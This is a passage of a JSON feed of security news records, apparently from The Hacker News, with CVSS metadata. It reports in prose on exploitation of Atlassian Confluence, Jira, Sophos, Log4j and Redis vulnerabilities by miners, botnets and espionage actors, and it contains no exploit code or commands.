Cyber Command [warned](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>) of ongoing mass exploitation attempts in the wild targeting a now-patched critical security vulnerability affecting Atlassian Confluence deployments.\n\nTracked as CVE-2021-26084 (CVSS score: 9.8), the flaw concerns an OGNL (Object-Graph Navigation Language) injection flaw that, in specific instances, could be exploited to execute arbitrary code on a Confluence Server or Data Center instance.\n\nAccording to cybersecurity firm Censys, a search engine for finding internet devices, around 14,637 exposed and vulnerable Confluence servers were discovered right before details about the flaw became public on August 25, a number that has since dropped to 8,597 as of September 5 as companies continue to apply Atlassian's patches and pull afflicted servers from being reachable over the internet.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-07T10:05:00", "type": "thn", "title": "Latest Atlassian Confluence Flaw Exploited to Breach Jenkins Project Server", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-07T10:05:28", "id": "THN:F076354512CA34C263F222F3D62FCB1E", "href": "https://thehackernews.com/2021/09/latest-atlassian-confluence-flaw.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-01T09:57:46", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEiYAJVYh7pU2b-Cxud9O1OpqsSwZ8YbSRc4HT6Cl84UE1B0y7nA6w78v6G2gfrH0CgQlYIfu0sypoAedPhkg5IjEPSr4btJnWbRlNUVivoYBtop-pya2puoyFdfhMSBEHez9B2xUru68Zv-DLxNWbxFad3b5mVOAcpQY8lBe_JBMpXEgmBFN0ec7z-R/s728-e100/linux.jpg>)\n\nA cloud threat actor group tracked as 8220 has updated its malware toolset to breach Linux servers with the goal of installing crypto miners as part of a long-running campaign.\n\n\"The updates include the deployment of new versions of a crypto miner and an IRC bot,\" Microsoft Security Intelligence [said](<https://twitter.com/MsftSecIntel/status/1542281805549764608>) in a series of tweets on Thursday. \"The group has actively updated its techniques and payloads over the last year.\"\n\n8220, active since [early 2017](<https://blog.talosintelligence.com/2018/12/cryptomining-campaigns-2018.html>), is a Chinese-speaking, Monero-mining threat actor so named for its preference to communicate with command-and-control (C2) servers over port 8220. 
It's also the developer of a tool called whatMiner, which has been co-opted by the [Rocke](<https://thehackernews.com/2021/02/new-cryptojacking-malware-targeting.html>) cybercrime group in their attacks.\n\nIn July 2019, the Alibaba Cloud Security Team [uncovered](<https://www.alibabacloud.com/blog/8220-mining-group-now-uses-rootkit-to-hide-its-miners_595055>) an extra shift in the adversary's tactics, noting its use of rootkits to hide the mining program. Two years later, the gang [resurfaced](<https://www.lacework.com/blog/8220-gangs-recent-use-of-custom-miner-and-botnet/>) with Tsunami [IRC botnet](<https://en.wikipedia.org/wiki/IRC_bot>) variants and a custom \"PwnRig\" miner.\n\nNow according to Microsoft, the most recent campaign striking i686 and x86_64 Linux systems has been observed weaponizing remote code execution exploits for the freshly disclosed Atlassian Confluence Server ([CVE-2022-26134)](<https://thehackernews.com/2022/06/atlassian-confluence-flaw-being-used-to.html>) and Oracle WebLogic ([CVE-2019-2725](<https://thehackernews.com/2019/05/ransomware-oracle-weblogic.html>)) for initial access.\n\nThis step is succeeded by the retrieval of a malware loader from a remote server that's designed to drop the PwnRig miner and an IRC bot, but not before taking steps to evade detection by erasing log files and disabling cloud monitoring and security software.\n\nBesides achieving persistence by means of a cron job, the \"loader uses the IP port scanner tool 'masscan' to find other SSH servers in the network, and then uses the GoLang-based SSH brute force tool 'spirit' to propagate,\" Microsoft said.\n\nThe findings come as Akamai [revealed](<https://www.akamai.com/blog/security/atlassian-confluence-vulnerability-observations>) that the Atlassian Confluence flaw is witnessing a steady 20,000 exploitation attempts per day that are launched from about 6,000 IPs, down from a peak of 100,000 in the immediate aftermath of the bug disclosure on June 2, 2022. 
67% of the attacks are said to have originated from the U.S.\n\n\"In the lead, commerce accounts for 38% of the attack activity, followed by high tech and financial services, respectively,\" Akamai's Chen Doytshman said this week. \"These top three verticals make up more than 75% of the activity.\"\n\nThe attacks range from vulnerability probes to determine if the target system is susceptible to injection of malware such as web shells and crypto miners, the cloud security company noted.\n\n\"What is particularly concerning is how much of a shift upward this attack type has garnered over the last several weeks,\" Doytshman added. \"As we have seen with similar vulnerabilities, this CVE-2022-26134 will likely continue to be exploited for at least the next couple of years.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-01T05:36:00", "type": "thn", "title": "Microsoft Warns of Cryptomining Malware Campaign Targeting Linux Servers", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-2725", "CVE-2022-26134"], "modified": "2022-07-01T08:20:23", "id": "THN:F0450E1253FFE5CA527F039D3B3A72BD", "href": "https://thehackernews.com/2022/06/microsoft-warns-of-cryptomining-malware.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-05T15:21:14", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjZikEHbQZH2740G4dp8jO0kyRIM7gekb01xPNfj0-CNWOHWfP49M11r5XMILsEcE7cPt2iS2r5JguGaSn_eB79jXM2K0R34NTk8BJ914Rl12I6nIAEFE-yl5_wTmv9bEkhsALDug2BF38CByGj0bXfCDfOdw9gmkOjWBtZi0TtheQni8IQOx3M9hnZ/s728-e100/hacking.jpg>)\n\nA threat actor is said to have \"highly likely\" exploited a security flaw in an outdated Atlassian Confluence server to deploy a never-before-seen backdoor against an unnamed organization in the research and technical services sector.\n\nThe attack, which transpired over a seven-day-period during the end of May, has been attributed to a threat activity cluster tracked by cybersecurity firm Deepwatch as **TAC-040**.\n\n\"The evidence indicates that the threat actor executed malicious commands with a parent process of tomcat9.exe in Atlassian's Confluence directory,\" the company [said](<https://www.deepwatch.com/labs/deepwatch-ati-detects-and-responds-to-never-before-discovered-backdoor-deployed-using-confluence-vulnerability-for-suspected-espionage/>). 
\"After the initial compromise, the threat actor ran various commands to enumerate the local system, network, and Active Directory environment.\"\n\nThe Atlassian vulnerability suspected to have been exploited is [CVE-2022-26134](<https://thehackernews.com/2022/06/atlassian-releases-patch-for-confluence.html>), an Object-Graph Navigation Language (OGNL) injection flaw that paves the way for arbitrary code execution on a Confluence Server or Data Center instance.\n\nFollowing reports of active exploitation in real-world attacks, the issue was addressed by the Australian company on June 4, 2022.\n\nBut given the absence of forensic artifacts, Deepwatch theorized the breach could have alternatively entailed the exploitation of the Spring4Shell vulnerability ([CVE-2022-22965](<https://thehackernews.com/2022/03/security-patch-releases-for-critical.html>)) to gain initial access to the Confluence web application.\n\nNot much is known about TAC-040 other than the fact that the adversarial collective's goals could be espionage-related, although the possibility that the group could have acted out of financial gain hasn't been ruled out, citing the presence of a loader for an XMRig crypto miner on the system.\n\nWhile there is no evidence that the miner was executed in this incident, the Monero address owned by the threat actors has netted at least 652 XMR ($106,000) by hijacking the computing resources of other systems to illicitly mine cryptocurrency.\n\nThe attack chain is also notable for the deployment of a previously undocumented implant called Ljl Backdoor on the compromised server. Roughly 700MB of archived data is estimated to have been exfiltrated before the server was taken offline by the victim, according to an analysis of the network logs.\n\nThe malware, for its part, is a fully-featured trojan virus designed to gather files and user accounts, load arbitrary .NET payloads, and amass system information as well as the victim's geographic location. 
\n\n\"The victim denied the threat actor the ability to laterally move within the environment by taking the server offline, potentially preventing the exfiltration of additional sensitive data and restricting the threat actor(s) ability to conduct further malicious activities,\" the researchers said.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-04T10:24:00", "type": "thn", "title": "Hackers Exploited Atlassian Confluence Bug to Deploy Ljl Backdoor for Espionage", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22965", "CVE-2022-26134"], "modified": "2022-08-05T14:21:49", "id": "THN:EAFAEB28A545DC638924DAC8AAA4FBF2", "href": "https://thehackernews.com/2022/08/hackers-exploited-atlassian-confluence.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-18T03:57:04", 
"description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjgpvdXejiTfwIlf3wPHIzsqwrtWGd_UVqF569qifyNIKommhLUjf5dLuF__8BWAVuomoK7Tjv03yLr8nENvhakrn1qW-YxaHhRkYOtDEmW8uq9xYxqTrmWnx4a-valU6Pz2wW9AJDs3n89ygTe8g5wduuCsFDkSwFnxhC6LGVpEIRGHIbakY-7iAww/s728-e100/hackers.jpg>)\n\nA sophisticated Chinese advanced persistent threat (APT) actor exploited a critical security vulnerability in Sophos' firewall product that came to light earlier this year to infiltrate an unnamed South Asian target as part of a highly-targeted attack.\n\n\"The attacker implement[ed] an interesting web shell backdoor, create[d] a secondary form of persistence, and ultimately launch[ed] attacks against the customer's staff,\" Volexity [said](<https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/>) in a report. \"These attacks aimed to further breach cloud-hosted web servers hosting the organization's public-facing websites.\"\n\nThe zero-day flaw in question is tracked as [CVE-2022-1040](<https://thehackernews.com/2022/03/critical-sophos-firewall-rce.html>) (CVSS score: 9.8), and concerns an authentication bypass vulnerability that can be weaponized to execute arbitrary code remotely. It affects Sophos Firewall versions 18.5 MR3 (18.5.3) and earlier.\n\nThe cybersecurity firm, which issued a patch for the flaw on March 25, 2022, noted that it was abused to \"target a small set of specific organizations primarily in the South Asia region\" and that it had notified the affected entities directly.\n\nNow according to Volexity, early evidence of exploitation of the flaw commenced on March 5, 2022, when it detected anomalous network activity originating from an unnamed customer's Sophos Firewall running the then up-to-date version, nearly three weeks before public disclosure of the vulnerability.\n\n\"The attacker was using access to the firewall to conduct man-in-the-middle (MitM) attacks,\" the researchers said. 
\"The attacker used data collected from these MitM attacks to compromise additional systems outside of the network where the firewall resided.\"\n\n[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEjfKjGMxU9f1By4kZoaueFeICYJthIRyuvPWTxc8s0q2C7jWNX1Gnw6l06cNevtbWwc-WlR-RqbNxeIsdNPX2peEnO-wx8UlXLZt_DXhDA1SO-PFFO9ZBTJgHRcFERamkXbe2rC2UmykVCY8sMi4uQAmKGhBFdo0cmodi9751cbQW1T4L9-2SdlpXhr/s728-e100/cyber.jpg>)\n\nThe infection sequence post the firewall breach further entailed backdooring a legitimate component of the security software with the [Behinder](<https://github.com/Freakboy/Behinder>) web shell that could be remotely accessed from any URL of the threat actor's choosing.\n\nIt's noteworthy that the Behinder web shell was also leveraged earlier this month by Chinese APT groups in a separate set of intrusions exploiting a zero-day flaw in Atlassian Confluence Server systems ([CVE-2022-26134](<https://thehackernews.com/2022/06/hackers-exploiting-unpatched-critical.html>)).\n\nAdditionally, the attacker is said to have created VPN user accounts to facilitate remote access, before moving on to modify DNS responses for specially targeted websites \u2014 primarily the victim's content management system (CMS) \u2014 with the goal of intercepting user credentials and session cookies.\n\nThe access to session cookies subsequently equipped the malicious party to take control of the WordPress site and install a second web shell dubbed [IceScorpion](<https://zhuanlan.zhihu.com/p/354906657>), with the attacker using it to deploy three open-source implants on the web server, including [PupyRAT](<https://github.com/n1nj4sec/pupy>), [Pantegana](<https://github.com/cassanof/pantegana>), and [Sliver](<https://github.com/BishopFox/sliver>).\n\n\"DriftingCloud is an effective, well equipped, and persistent threat actor targeting [five-poisons](<https://en.wikipedia.org/wiki/Five_Poisons>)-related targets. 
They are able to develop or purchase zero-day exploits to achieve their goals, tipping the scales in their favor when it comes to gaining entry to target networks.\"\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-17T09:39:00", "type": "thn", "title": "Chinese Hackers Exploited Sophos Firewall Zero-Day Flaw to Target South Asian Entity", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-1040", "CVE-2022-26134"], "modified": "2022-06-18T03:43:31", "id": "THN:1E1F3CC9BEE728A9F18B223FC131E9B1", "href": "https://thehackernews.com/2022/06/chinese-hackers-exploited-sophos.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:39:26", "description": 
"[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEj61Yvi82eU_SsNVfNm8WazXtxvcYXm-sCRLGmk5m-EijyMKxnX7EywsH3x3g08_XJKLrzN6v1fAWhIVPYSGdCWww6qP6J3eriq2RAyEhFEI8Q7GpR1uolW0eRgUZr8gQDOyMty2WhvSGuA8o5zI4uVLgouljVIzwLo6jec4rUwyfZxNM2dJrDTyvOE/s728-e100/jira.jpg>)\n\nAtlassian has published a security advisory warning of a critical vulnerability in its Jira software that could be abused by a remote, unauthenticated attacker to circumvent authentication protections.\n\nTracked as [**CVE-2022-0540**](<https://nvd.nist.gov/vuln/detail/CVE-2022-0540>), the flaw is rated 9.9 out of 10 on the CVSS scoring system and resides in Jira's authentication framework, Jira Seraph. Khoadha of Viettel Cyber Security has been credited with discovering and reporting the security weakness.\n\n\"A remote, unauthenticated attacker could exploit this by sending a specially crafted HTTP request to bypass authentication and authorization requirements in WebWork actions using an affected configuration,\" Atlassian [noted](<https://confluence.atlassian.com/jira/jira-security-advisory-2022-04-20-1115127899.html>).\n\nThe flaw affects the following Jira products -\n\n * Jira Core Server, Jira Software Server and Jira Software Data Center: All versions before 8.13.18, 8.14.x, 8.15.x, 8.16.x, 8.17.x, 8.18.x, 8.19.x, 8.20.x before 8.20.6, and 8.21.x\n * Jira Service Management Server and Jira Service Management Data Center: All versions before 4.13.18, 4.14.x, 4.15.x, 4.16.x, 4.17.x, 4.18.x, 4.19.x, 4.20.x before 4.20.6, and 4.21.x\n\nFixed Jira and Jira Service Management versions are 8.13.18, 8.20.6, and 8.22.0 and 4.13.18, 4.20.6, and 4.22.0.\n\nAtlassian also noted that the flaw affects first and third-party apps only if they are installed in one of the aforementioned Jira or Jira Service Management versions and that they are using a vulnerable configuration.\n\nUsers are strongly recommended to update to one of the patched versions to mitigate potential exploitation attempts. 
If immediate patching isn't an option, the company is advising updating the affected apps to a fixed version or disabling them altogether.\n\nIt's worth noting that a critical remote code execution flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/us-cyber-command-warns-of-ongoing.html>), CVSS score: 9.8) was actively weaponized in the wild last year to [install](<https://thehackernews.com/2021/09/latest-atlassian-confluence-flaw.html>) [cryptocurrency miners](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>) on compromised servers.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-23T05:52:00", "type": "thn", "title": "Atlassian Drops Patches for Critical Jira Authentication Bypass Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", 
"CVE-2022-0540"], "modified": "2022-04-23T05:52:42", "id": "THN:81C9EF28EEDF49E21E8DF15A8FF7EB8D", "href": "https://thehackernews.com/2022/04/atlassian-drops-patches-for-critical.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-05-09T12:37:49", "description": "[](<https://thehackernews.com/new-images/img/a/AVvXsEhxt34pnwkNBgdh1y4-6xfSP-mpRKSltUMdSLDF55Eno17d47MYCQMSDAGq2OZeCWpHDNnZUH8W1fIjZdtvlDKtRo_8406-8p3Tt1czUwjmnUWHQH1uhmjFu2w55IgERDhFTLDY9xJoJtni4DCbI0Mq1L1iwjJ2yLvaZvWMTnwKtZmlFsZO1DMdbQ0a>)\n\nThreat actors are actively [weaponizing](<https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/>) unpatched servers affected by the newly identified \"[**Log4Shell**](<https://thehackernews.com/2021/12/extremely-critical-log4j-vulnerability.html>)\" vulnerability in Log4j to install cryptocurrency miners, Cobalt Strike, and recruit the devices into a botnet, even as telemetry signs point to exploitation of the flaw nine days before it even came to light.\n\nNetlab, the networking security division of Chinese tech giant Qihoo 360, [disclosed](<https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/>) threats such as [Mirai](<https://thehackernews.com/2016/11/ddos-attack-mirai-botnet.html>) and [Muhstik](<https://thehackernews.com/2018/05/botnet-malware-hacking.html>) (aka Tsunami) are setting their sights on vulnerable systems to spread the infection and grow its computing power to orchestrate distributed denial-of-service (DDoS) attacks with the goal of overwhelming a target and rendering it unusable. 
Muhstik was previously spotted exploiting a critical security flaw in Atlassian Confluence ([CVE-2021-26084](<https://thehackernews.com/2021/09/atlassian-confluence-rce-flaw-abused-in.html>), CVSS score: 9.8) earlier this September.\n\nThe latest development comes as it has emerged that the vulnerability has been under attack for at least more than a week prior to its public disclosure on December 10, and companies like [Auvik](<https://www.reddit.com/r/msp/comments/rdba36/critical_rce_vulnerability_is_affecting_java/>), [ConnectWise Manage](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>), and [N-able](<https://www.n-able.com/security-and-privacy/apache-log4j-vulnerability>) have confirmed their services are impacted, widening the scope of the flaw's reach to more manufacturers.\n\n\"Earliest evidence we've found so far of [the] Log4j exploit is 2021-12-01 04:36:50 UTC,\" Cloudflare CEO Matthew Prince [tweeted](<https://twitter.com/eastdakota/status/1469800951351427073>) Sunday. \"That suggests it was in the wild at least nine days before publicly disclosed. 
However, don't see evidence of mass exploitation until after public disclosure.\" Cisco Talos, in an independent [report](<https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html>), said it observed attacker activity related to the flaw beginning December 2.\n\n[](<https://thehackernews.com/new-images/img/a/AVvXsEgfMpATNB5GkuC13rGMq6XMiFBdOjwWBuD-ZOuvjNFP7YxSWaotzdhrzjdXbTIaMEp8-l6iWWDH92mwneLD8TjmjuxtRNakibAOsb2Bx7UplaRi0KIfAJe2kSIOkIyBGl9uSFCGFJoM8U83ckS-pICLmEcmdQGD1quBku8bU4z_kfoRubl5R-sNju8bog>)\n\nTracked [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (CVSS score: 10.0), the flaw concerns a case of remote code execution in Log4j, a Java-based open-source Apache logging framework broadly used in enterprise environments to record events and messages generated by software applications.\n\nAll that is required of an adversary to leverage the vulnerability is send a specially crafted string containing the malicious code that gets logged by Log4j version 2.0 or higher, effectively enabling the threat actor to load arbitrary code from an attacker-controlled domain on a susceptible server and take over control.\n\n\"The bulk of attacks that Microsoft has observed at this time have been related to mass scanning by attackers attempting to thumbprint vulnerable systems, as well as scanning by security companies and researchers,\" Microsoft 365 Defender Threat Intelligence Team [said](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/>) in an analysis. 
\"Based on the nature of the vulnerability, once the attacker has full access and control of an application, they can perform a myriad of objectives.\"\n\nIn particular, the Redmond-based tech giant said it detected a wealth of malicious activities, including installing Cobalt Strike to enable credential theft and lateral movement, deploying coin miners, and exfiltrating data from the compromised machines.\n\nThe situation has also left companies scrambling to roll out fixes for the bug. Network security vendor SonicWall, in an [advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032>), revealed its Email Security solution is affected, stating it's working to release a fix for the issue while it continues to investigate the rest of its lineup. Virtualization technology provider VMware, likewise, warned of \"[exploitation attempts in the wild](<https://www.vmware.com/security/advisories/VMSA-2021-0028.html>),\" adding that it's pushing out patches to a number of its products.\n\nIf anything, incidents like these illustrate how a single flaw, when uncovered in packages incorporated in a lot of software, can have ripple effects, acting as a channel for further attacks and posing a critical risk to affected systems. \"All threat actors need to trigger an attack is one line of text,\" Huntress Labs Senior Security Researcher John Hammond [said](<https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java>). \"There's no obvious target for this vulnerability \u2014 hackers are taking a spray-and-pray approach to wreak havoc.\"\n\n \n\n\nFound this article interesting? 
Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T05:10:00", "type": "thn", "title": "Apache Log4j Vulnerability \u2014 Log4Shell \u2014 Widely Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084", "CVE-2021-44228"], "modified": "2021-12-13T14:58:24", "id": "THN:2656971C06C4E3D4B0A8C0AC02BBB775", "href": "https://thehackernews.com/2021/12/apache-log4j-vulnerability-log4shell.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:25", "description": "[](<https://thehackernews.com/new-images/img/b/R29vZ2xl/AVvXsEh09KugWf9Nll7KSG7yZBNIvMLXvLKZ92heAygg8X6PYa2oq5Gp7OARqFBSZyMbfZCsrcK9Mh72AhpOgxuEXhmjAynK6iRSEf_xMMAl_T0oqulTMyMrJgAc7PDPFVO0MuKFWRJessc_Iu5-Rm-QSXVXRVTrU_666K232IVvIKEiChh39TVtKy5BnyQY/s728-e100/redis.jpg>)\n\nMuhstik, a botnet infamous for propagating via web application 
exploits, has been observed targeting Redis servers using a recently disclosed vulnerability in the database system.\n\nThe vulnerability relates to [CVE-2022-0543](<https://nvd.nist.gov/vuln/detail/CVE-2022-0543>), a [Lua sandbox escape flaw](<https://www.ubercomp.com/posts/2022-01-20_redis_on_debian_rce>) in the open-source, in-memory, key-value data store that could be abused to achieve remote code execution on the underlying machine. The vulnerability is rated 10 out of 10 for severity.\n\n\"Due to a packaging issue, a remote attacker with the ability to execute arbitrary Lua scripts could possibly escape the Lua sandbox and execute arbitrary code on the host,\" Ubuntu noted in an advisory released last month.\n\nAccording to [telemetry data](<https://blogs.juniper.net/en-us/security/muhstik-gang-targets-redis-servers>) gathered by Juniper Threat Labs, the attacks leveraging the new flaw are said to have commenced on March 11, 2022, leading to the retrieval of a malicious shell script (\"russia.sh\") from a remote server, which is then utilized to fetch and execute the botnet binaries from another server.\n\nFirst [documented](<https://blog.netlab.360.com/gpon-exploit-in-the-wild-i-muhstik-botnet-among-others-en/>) by Chinese security firm Netlab 360, Muhstik is known to be [active](<https://www.lacework.com/blog/meet-muhstik-iot-botnet-infecting-cloud-servers/>) since March 2018 and is monetized for carrying out coin mining activities and staging distributed denial-of-service (DDoS) attacks.\n\nCapable of self-propagating on Linux and IoT devices like GPON home router, DD-WRT router, and [Tomato routers](<https://unit42.paloaltonetworks.com/muhstik-botnet-attacks-tomato-routers-to-harvest-new-iot-devices/>), Muhstik has been spotted weaponizing a number of flaws over the years \u2013\n\n * [**CVE-2017-10271**](<https://nvd.nist.gov/vuln/detail/cve-2017-10271>) (CVSS score: 7.5) \u2013 An input validation vulnerability in the Oracle WebLogic Server component of 
